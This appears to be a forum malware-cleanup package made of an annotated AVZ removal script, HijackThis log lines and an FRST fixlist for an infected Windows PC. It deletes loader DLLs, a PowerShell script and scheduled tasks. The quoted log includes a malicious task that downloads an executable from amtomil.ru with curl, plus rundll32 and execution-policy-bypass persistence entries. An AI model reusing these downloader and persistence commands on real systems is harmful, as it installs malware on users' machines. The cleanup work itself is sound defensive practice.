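begin
  // Take the TCP/IP stack down first so the dropped loaders cannot re-download
  // or beacon while the cleanup runs; the machine is rebooted at the end anyway.
  ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
  // Rootkit search and AVZGuard are only started from the native (non-WOW64) process.
  if not IsWOW64
  then
  begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
  end;
  // Quarantine every sample before it is deleted so it stays available for
  // analysis (the quarantine archive is built by the follow-up script).
  QuarantineFile('C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe','');
  QuarantineFile('C:\Users\AMD\AppData\Roaming\curl\curl.exe','');
  QuarantineFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll','');
  // Second rundll32 loader DLL from the O22 log lines (task TnqpiRJoXWMCwN);
  // it was not covered by the original script.
  QuarantineFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll','');
  QuarantineFile('C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1','');
  QuarantineFile('C:\WINDOWS\rss\csrss.exe','');
  DeleteFile('C:\WINDOWS\rss\csrss.exe','32');
  DeleteFile('C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1','32');
  DeleteFile('C:\WINDOWS\system32\Tasks\c6dc8799cda1c3052092a351612294ad','64');
  DeleteFile('C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll','32');
  DeleteFile('C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll','32');
  DeleteFile('C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe','32');
  // schtasks takes the task name as the value of /TN. The original lines passed
  // '/TN name" /F' with an unpaired quote: the command-line parser treats
  // everything from that quote to the end of the line as part of the name,
  // so schtasks sees a wrong name and the /F switch is swallowed. The name is
  // now quoted on both sides.
  ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh" /F', 0, 15000, true);
  // Same loader DLL is also registered as task uuxHwpnMkRCRpJh2 and, via a
  // second DLL, as TnqpiRJoXWMCwN (both "Running" in the O22 lines).
  ExecuteFile('schtasks.exe', '/delete /TN "uuxHwpnMkRCRpJh2" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "TnqpiRJoXWMCwN" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "c6dc8799cda1c3052092a351612294ad" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "csrss" /F', 0, 15000, true);
  // The log lists both "curl" (the downloader task, binary already missing)
  // and "curls"; the original script only removed the latter.
  ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "fdd10e4d13eb145b13312c082d0ea9aa" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
  // NOTE(review): still not addressed by this script and worth confirming on a
  // fresh log: the service that the fdd10e4d... task starts via sc.exe, the
  // O17 NameServer entries, and the S2 OtherSearch service / kl.dll (the FRST
  // fixlist below is expected to handle the latter).
  BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
  BC_ImportALL;
  RebootWindows(true);
end.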
begin
  // Pack everything the cleanup script quarantined into quarantine.zip next to
  // the AVZ executable, so the samples can be uploaded for analysis.
  CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
end.
R4 - HKU\S-1-5-21-2136459447-3471906867-1024948565-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} - (no name) - (no URL)
O2-32 - BHO: Html5 geolocation provider - {9BFBA68E-E21B-458E-AE12-FE85E903D2C0} - (no file)
O2-32 - BHO: MRSearchPlugin - {8E8F97CD-60B5-456F-A201-73065652D099} - (no file)
O2-32 - BHO: YoutubeAdBlock - {C0D38E5A-7CF8-4105-8FE8-31B81443A114} - (no file)
O17 - HKLM\System\CSS\Services\Tcpip\..\{9f53359b-4e99-410d-ac02-0b9aa3894da4}: NameServer = 10.173.0.1
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 178.132.6.57
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 193.238.153.54
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 46.101.28.31
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 52.56.51.39
O17 - HKLM\System\CSS\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 82.202.226.203
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{9f53359b-4e99-410d-ac02-0b9aa3894da4}: NameServer = 10.173.0.1
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 178.132.6.57
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 193.238.153.54
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 46.101.28.31
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 52.56.51.39
O17 - HKLM\System\ControlSet001\Services\Tcpip\..\{b5bdd048-48d0-47b9-81d7-aedc41f1fb95}: NameServer = 82.202.226.203
O22 - Task (Ready): qn9SpIumt6 - C:\Program Files (x86)\S9YGPGPPyq\updengine.exe (file missing)
O22 - Task (Running): TnqpiRJoXWMCwN - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\GXZiGyYLSHyU2\j23eY1B.dll",#1
O22 - Task (Running): uuxHwpnMkRCRpJh - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll",#1
O22 - Task (Running): uuxHwpnMkRCRpJh2 - C:\WINDOWS\system32\rundll32.exe "C:\Program Files (x86)\thzXuJvjU\ZzB5QsG.dll",#1
O22 - Task (Ready): fdd10e4d13eb145b13312c082d0ea9aa - C:\WINDOWS\system32\sc.exe start fdd10e4d13eb145b13312c082d0ea9a
O22 - Task (Ready): c6dc8799cda1c3052092a351612294ad - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\WINDOWS\c6dc8799cda1c3052092a351612294ad.ps1"
O22 - Task (Ready): csrss - C:\WINDOWS\rss\csrss.exe (file missing)
O22 - Task (Ready): curl - C:\Users\AMD\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\AMD\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): curls - C:\Users\AMD\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): MSI - C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\kmplayer_4_0_732-c24___.exe" (file missing)
Start::
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\S9YGPGPPyq\kl.dll",Svc [X] <==== ATTENTION
C:\Program Files (x86)\S9YGPGPPyq\kl.dll
2017-08-28 18:09 - 2017-08-31 00:35 - 000000000 ____D C:\Program Files (x86)\QYERbvxRHIE
2017-08-28 18:09 - 2017-08-28 18:12 - 000000000 ____D C:\Program Files (x86)\GXZiGyYLSHyU2
2017-08-28 18:09 - 2017-08-28 18:11 - 000000000 ____D C:\Program Files (x86)\thzXuJvjU
2017-08-28 18:09 - 2017-08-28 18:09 - 000000000 ____D C:\WINDOWS\SysWOW64\SSL
2017-08-28 18:08 - 2017-08-30 21:06 - 000000000 ____D C:\Users\AMD\AppData\Local\bd683f405ffc4694a7f13185c2a12105
2017-08-28 18:08 - 2017-08-28 18:19 - 000000000 ____D C:\Program Files (x86)\S9YGPGPPyq
2017-08-28 18:08 - 2017-08-28 18:18 - 000000000 ____D C:\Users\AMD\AppData\Local\5845cdd21afc4a209524bad837dcfa3a
2017-08-28 18:08 - 2017-08-28 18:10 - 000000000 ____D C:\Users\Все пользователи\245e0fcfe14f4ab697a1de5f1b36bdf8
2017-08-28 18:08 - 2017-08-28 18:10 - 000000000 ____D C:\ProgramData\245e0fcfe14f4ab697a1de5f1b36bdf8
2017-08-28 18:00 - 2017-08-30 21:06 - 000000000 ____D C:\Users\AMD\AppData\Roaming\c9c0d020105044ec8067fc5a5e953f1d
2017-08-28 18:00 - 2017-08-28 18:18 - 000000000 ____D C:\Users\Все пользователи\07e1088b9fe04728aee9fbbbc20a3bf3
2017-08-28 18:00 - 2017-08-28 18:18 - 000000000 ____D C:\ProgramData\07e1088b9fe04728aee9fbbbc20a3bf3
2017-08-28 18:00 - 2017-08-28 18:12 - 000000000 ____D C:\Users\AMD\AppData\Roaming\11e94b5b56294a17aa939a3536471968
2017-08-28 17:56 - 2017-08-28 18:13 - 000000000 ____D C:\Users\AMD\AppData\Roaming\curl
2017-08-28 17:53 - 2017-08-28 18:11 - 000000000 ____D C:\Users\AMD\AppData\Local\indexer
2017-08-28 17:46 - 2017-08-28 18:07 - 000003478 __RSH C:\WINDOWS\System32\Tasks\MSI
Task: {083A0758-E79E-48C4-A2D1-323337865B5A} - \FastDataX Task -> No File <==== ATTENTION
Task: {0B07A8EF-3E5B-46C8-9800-59BB7161785B} - System32\Tasks\MSI => C:\Users\AMD\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
Task: {48992818-BB30-4CF7-8B15-9989A9F742F8} - \SigmaTel Studio -> No File <==== ATTENTION
Task: {F87A589F-7178-4109-9507-A83CA728C455} - \indexer -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::